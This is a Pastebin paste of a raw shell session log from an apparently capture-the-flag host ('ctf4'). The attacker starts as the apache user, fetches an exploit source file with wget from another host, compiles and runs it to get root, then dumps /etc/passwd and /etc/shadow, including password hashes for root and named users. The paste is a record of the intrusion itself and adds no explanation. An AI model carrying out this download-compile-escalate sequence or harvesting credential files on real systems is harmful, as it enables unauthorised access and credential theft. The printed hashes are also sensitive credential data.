SHARE
TWEET

bashrc nullcon

a guest Jan 17th, 2012 192 Never
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
  1. sh: no job control in this shell
  2. sh-3.1$ id
  3. uid=48(apache) gid=48(apache) groups=48(apache) context=system_u:system_r:httpd_sys_script_t
  4. sh-3.1$ uname -a
  5. Linux ctf4.sas.upenn.edu 2.6.15-1.2054_FC5 #1 Tue Mar 14 15:48:33 EST 2006 i686 i686 i386 GNU/Linux
  6. sh-3.1$ cd /tmp/
  7. sh-3.1$ ls -la
  8. total 904
  9. drwxrwxrwt 15 root      root        4096 Jan 11 10:07 .
  10. drwxr-xr-x 23 root      root        4096 Jan 11 09:38 ..
  11. drwxrwxrwt  2 root      root        4096 Jan 11 07:15 .ICE-unix
  12. -r--r--r--  1 root      root          11 Jan 11 07:07 .X0-lock
  13. drwxrwxrwt  2 root      root        4096 Jan 11 07:07 .X11-unix
  14. drwxrwxrwt  2 root      root        4096 Jan 11 07:06 .font-unix
  15. srw-rw-rw-  1 root      root           0 Jan 11 07:07 .gdm_socket
  16. drwx------  2 root      root        4096 Mar  6  2009 .mozilla
  17. -rw-rw-rw-  1 mysql     mysql         13 Jan 11 09:57 1.txt
  18. -rw-rw-rw-  1 mysql     mysql         36 Jan 11 09:58 2.txt
  19. drwx------  2 achen     achen       4096 Mar 10  2009 gconfd-achen
  20. drwx------  2 dstevens  dstevens    4096 Mar 11  2009 gconfd-dstevens
  21. drwx------  2 ghighland ghighland   4096 Mar 10  2009 gconfd-ghighland
  22. drwx------  2 root      root        4096 Mar 18  2009 gconfd-root
  23. drwx------  3 sorzek    sorzek      4096 Jan 11 07:15 gconfd-sorzek
  24. drwx------  2 sorzek    sorzek      4096 Jan 11 07:15 keyring-FiP3XI
  25. srwxrwxr-x  1 achen     achen          0 Mar 10  2009 mapping-achen
  26. srwxrwxr-x  1 dstevens  dstevens       0 Mar 11  2009 mapping-dstevens
  27. srwxrwxr-x  1 ghighland ghighland      0 Mar 10  2009 mapping-ghighland
  28. srwxr-xr-x  1 root      root           0 Mar 18  2009 mapping-root
  29. srwxrwxr-x  1 sorzek    sorzek         0 Jan 11 07:15 mapping-sorzek
  30. drwx------  2 sorzek    sorzek      4096 Jan 11 07:16 orbit-sorzek
  31. -rwsr-xr-x  1 root      root      720888 Jan 11 10:09 sh
  32. drwx------  2 sorzek    sorzek      4096 Jan 11 07:15 ssh-yXwuKb2964
  33. -rw-rw-rw-  1 mysql     mysql         13 Jan 11 10:07 test1.txt
  34. -rw-rw-rw-  1 mysql     mysql         36 Jan 11 10:07 test2.txt
  35. drwx------  2 sorzek    sorzek      4096 Jan 11 07:15 virtual-sorzek.7IeXOH
  36. -rw-------  1 sorzek    sorzek      1062 Jan 11 08:15 xses-sorzek.HeSMY4
  37. sh-3.1$ wget http://192.168.221.130/exploit/9479.c
  38. --10:09:30--  http://192.168.221.130/exploit/9479.c
  39.            => `9479.c'
  40. Connecting to 192.168.221.130:80... connected.
  41. HTTP request sent, awaiting response... 200 OK
  42. Length: 3,379 (3.3K) [text/x-csrc]
  43.  
  44.     0K ...                                                   100%   61.97 MB/s
  45.  
  46. 10:09:30 (61.97 MB/s) - `9479.c' saved [3379/3379]
  47.  
  48. sh-3.1$ gcc 9479.c -o root
  49. sh-3.1$ ./root
  50. sh: no job control in this shell
  51. sh-3.1# id
  52. uid=0(root) gid=0(root) groups=48(apache) context=system_u:system_r:httpd_sys_script_t
  53. sh-3.1# cat /etc/passwd
  54. root:x:0:0:root:/root:/bin/bash
  55. bin:x:1:1:bin:/bin:/sbin/nologin
  56. daemon:x:2:2:daemon:/sbin:/sbin/nologin
  57. adm:x:3:4:adm:/var/adm:/sbin/nologin
  58. lp:x:4:7:lp:/var/spool/lpd:/sbin/nologin
  59. sync:x:5:0:sync:/sbin:/bin/sync
  60. shutdown:x:6:0:shutdown:/sbin:/sbin/shutdown
  61. halt:x:7:0:halt:/sbin:/sbin/halt
  62. mail:x:8:12:mail:/var/spool/mail:/sbin/nologin
  63. news:x:9:13:news:/etc/news:
  64. uucp:x:10:14:uucp:/var/spool/uucp:/sbin/nologin
  65. operator:x:11:0:operator:/root:/sbin/nologin
  66. games:x:12:100:games:/usr/games:/sbin/nologin
  67. gopher:x:13:30:gopher:/var/gopher:/sbin/nologin
  68. ftp:x:14:50:FTP User:/var/ftp:/sbin/nologin
  69. nobody:x:99:99:Nobody:/:/sbin/nologin
  70. dbus:x:81:81:System message bus:/:/sbin/nologin
  71. rpm:x:37:37::/var/lib/rpm:/sbin/nologin
  72. apache:x:48:48:Apache:/var/www:/sbin/nologin
  73. distcache:x:94:94:Distcache:/:/sbin/nologin
  74. ntp:x:38:38::/etc/ntp:/sbin/nologin
  75. nscd:x:28:28:NSCD Daemon:/:/sbin/nologin
  76. vcsa:x:69:69:virtual console memory owner:/dev:/sbin/nologin
  77. webalizer:x:67:67:Webalizer:/var/www/usage:/sbin/nologin
  78. dovecot:x:97:97:dovecot:/usr/libexec/dovecot:/sbin/nologin
  79. mysql:x:27:27:MySQL Server:/var/lib/mysql:/bin/bash
  80. netdump:x:34:34:Network Crash Dump user:/var/crash:/bin/bash
  81. pcap:x:77:77::/var/arpwatch:/sbin/nologin
  82. avahi:x:70:70:Avahi daemon:/:/sbin/nologin
  83. named:x:25:25:Named:/var/named:/sbin/nologin
  84. mailnull:x:47:47::/var/spool/mqueue:/sbin/nologin
  85. smmsp:x:51:51::/var/spool/mqueue:/sbin/nologin
  86. haldaemon:x:68:68:HAL daemon:/:/sbin/nologin
  87. rpc:x:32:32:Portmapper RPC user:/:/sbin/nologin
  88. xfs:x:43:43:X Font Server:/etc/X11/fs:/sbin/nologin
  89. gdm:x:42:42::/var/gdm:/sbin/nologin
  90. rpcuser:x:29:29:RPC Service User:/var/lib/nfs:/sbin/nologin
  91. nfsnobody:x:65534:65534:Anonymous NFS User:/var/lib/nfs:/sbin/nologin
  92. sshd:x:74:74:Privilege-separated SSH:/var/empty/sshd:/sbin/nologin
  93. dstevens:x:500:506:Don Stevens:/home/dstevens:/bin/bash
  94. achen:x:501:501:Andrew Chen:/home/achen:/bin/bash
  95. pmoore:x:502:502:Phillip Moore:/home/pmoore:/bin/bash
  96. jdurbin:x:503:503:James Durbin:/home/jdurbin:/bin/bash
  97. sorzek:x:504:504:Sally Orzek:/home/sorzek:/bin/bash
  98. ghighland:x:505:505:Greg Highland:/home/ghighland:/bin/bash
  99. ossec:x:506:508::/var/ossec:/sbin/nologin
  100. ossecm:x:507:508::/var/ossec:/sbin/nologin
  101. ossecr:x:508:508::/var/ossec:/sbin/nologin
  102. sh-3.1# cat /etc/issue
  103. Fedora Core release 5 (Bordeaux)
  104. Kernel \r on an \m
  105.  
  106. sh-3.1# cat /etc/shadow
  107. root:$1$IW2CPQzs$ba/aJ9zePc/r9tF2R6KAJ0:15350:0:99999:7:::
  108. bin:*:14309:0:99999:7:::
  109. daemon:*:14309:0:99999:7:::
  110. adm:*:14309:0:99999:7:::
  111. lp:*:14309:0:99999:7:::
  112. sync:*:14309:0:99999:7:::
  113. shutdown:*:14309:0:99999:7:::
  114. halt:*:14309:0:99999:7:::
  115. mail:*:14309:0:99999:7:::
  116. news:*:14309:0:99999:7:::
  117. uucp:*:14309:0:99999:7:::
  118. operator:*:14309:0:99999:7:::
  119. games:*:14309:0:99999:7:::
  120. gopher:*:14309:0:99999:7:::
  121. ftp:*:14309:0:99999:7:::
  122. nobody:*:14309:0:99999:7:::
  123. dbus:!!:14309:0:99999:7:::
  124. rpm:!!:14309:0:99999:7:::
  125. apache:!!:14309:0:99999:7:::
  126. distcache:!!:14309:0:99999:7:::
  127. ntp:!!:14309:0:99999:7:::
  128. nscd:!!:14309:0:99999:7:::
  129. vcsa:!!:14309:0:99999:7:::
  130. webalizer:!!:14309:0:99999:7:::
  131. dovecot:!!:14309:0:99999:7:::
  132. mysql:!!:14309:0:99999:7:::
  133. netdump:!!:14309:0:99999:7:::
  134. pcap:!!:14309:0:99999:7:::
  135. avahi:!!:14309:0:99999:7:::
  136. named:!!:14309:0:99999:7:::
  137. mailnull:!!:14309:0:99999:7:::
  138. smmsp:!!:14309:0:99999:7:::
  139. haldaemon:!!:14309:0:99999:7:::
  140. rpc:!!:14309:0:99999:7:::
  141. xfs:!!:14309:0:99999:7:::
  142. gdm:!!:14309:0:99999:7:::
  143. rpcuser:!!:14309:0:99999:7:::
  144. nfsnobody:!!:14309:0:99999:7:::
  145. sshd:!!:14309:0:99999:7:::
  146. dstevens:$1$fU8HOHqa$N542xtl0ft8NmsYkv5NFo/:14309:0:99999:7:::
  147. achen:$1$kxyn25Oz$w.MMADGQYIq4F52hi9DUQ.:14309:0:99999:7:::
  148. pmoore:$1$p0RXlomV$m03UsjoTZ08qG8gbWHgST0:14309:0:99999:7:::
  149. jdurbin:$1$CYmEyuc.$FXAeZHkhywwENbqE8h0O.0:14309:0:99999:7:::
  150. sorzek:$1$cWeWNRdU$VTtlKsoRBmhMghnkSwqCQ.:14312:0:99999:7:::
  151. ghighland:$1$ooKvtZEY$N2RpSaIylgFlHnBkbwUGz0:14309:0:99999:7:::
  152. ossec:!!:14312:0:99999:7:::
  153. ossecm:!!:14312:0:99999:7:::
  154. ossecr:!!:14312:0:99999:7:::
  155. sh-3.1# exit
  156. exit
  157. sh-3.1$ exit
  158. exit
RAW Paste Data
Top